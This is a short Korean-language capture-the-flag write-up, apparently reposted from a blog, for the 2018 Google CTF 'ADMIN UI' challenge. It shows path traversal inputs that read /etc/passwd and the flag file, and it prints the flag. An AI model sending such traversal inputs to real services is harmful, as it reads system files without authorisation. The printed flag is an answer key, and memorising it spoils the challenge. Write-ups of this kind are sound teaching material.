Tags: googlectf pwn pwnable google 

Rating:

### ADMIN UI (pwn-re)

> nc mngmnt-iface.ctfcompetition.com 1337

```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
```
1번 메뉴를 선택하면 패스워드를 입력해야 한다.

2번 메뉴를 선택하면 patchnotes 를 읽을 수 있는데 예를 들어서 "Version0.3" 을 입력하면 "Version0.3" 파일을 읽어서 출력해준다.
이를 이용해서 `"../../../etc/passwd"` 를 입력하면 사용자 정보를 확인할 수 있다.
```
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../../../etc/passwd
(생략)
user:x:1337:1337::/home/user:
```

user 라는 사용자명을 확인했으면 user의 홈 디렉토리에서 플래그를 읽는다.
```
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
- Version0.3
- Version0.2
Which patchnotes should be shown?
../../../home/user/flag
CTF{I_luv_buggy_sOFtware}
```

**CTF{I_luv_buggy_sOFtware}**

Original writeup (https://rls1004.github.io/2018-06-25-googlectf-writeup-beginners/).